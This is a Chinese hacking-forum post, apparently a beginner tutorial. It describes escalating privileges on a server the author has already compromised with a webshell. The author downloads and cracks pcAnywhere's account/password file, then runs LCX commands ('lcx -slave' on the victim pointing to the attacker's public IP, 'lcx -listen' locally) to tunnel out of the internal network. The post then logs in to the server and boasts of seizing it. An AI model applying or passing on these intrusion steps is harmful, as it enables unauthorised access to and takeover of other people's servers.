- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
+ @+ p% H" p- v+ ]
8 R0 d+ k# u* [2 P6 _4 f0 w* w提权方法:pcanywhere+LCX
0 S E1 z$ F# x2 i1 Z
6 `' i. p! z& g' J S3 [; z2 w获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
( W# R `7 s; i, t$ q2 d4 @
' Q: T7 q6 B7 |# v: v在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。) ^2 F! f1 E3 W! `, p
% S. X& D1 c- l5 x
3 H% Z2 r* J! v& u2 o2 g
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。 g2 N0 [! l8 X) ?
- r& r4 X5 y0 n @! k* A
" ]. X* o4 ^, o; N, r5 ^呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。) v& q5 m3 m' i% Z4 a) g, Y; ~7 ~& z1 o
, M# G8 u- }; c8 P
( H5 _" [+ y2 Y- j# b! m% j+ I8 v
6 P$ n' g# W' Z
7 V7 Y% {$ ^" W8 a; W @# N% s
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``1 ~& P/ m$ o, i2 v# g }
# b* L: O; f1 j* y+ I; s h& h
* R( S0 O% ~* b+ P, d1 A% nLCX的用法再简单说下:" S) }9 ^- O3 R' D
% R4 [+ g) A6 L) ?& o/ q
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
9 _$ E1 i4 y8 |1 @: n5 R- D2 e7 R$ x1 }$ a+ u5 _
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
1 c' \9 k' f" Q6 _( l% V4 w5 d6 X& W ~* B) B. X
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
0 L1 I4 ?8 ]- S1 i0 `! r顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``. ?* x. H( R) h( |. `
, I* s& p( p9 c U0 Y6 ^1 y
! g8 p. s' T+ S9 x" D- `
( \# h( @" a% \6 [& z1 a* V& n8 i" `8 G8 a
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。0 t4 X# ?3 A! f
: ~& ^+ y z/ w2 C3 x) S. @/ ]0 i% C; J4 ~( B
9 b9 A3 v" j" o; M9 D
a0 ] m9 G- a7 G+ b我们本地连接试试,输入我们刚破解的账号密码
3 ?& v( `, P6 L* O2 G p& u, T; d: `- q* S
0 f& S3 ^! o$ C( m呵呵``连接成功,服务器不错,又一个8核^︵^
" k$ y( p! g% d% Q
1 G3 w8 {. S z) n( B. e# B! K
9 h$ s/ l9 ?( ?4 U' `3 T
Y0 z; h" i3 J. X& L |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|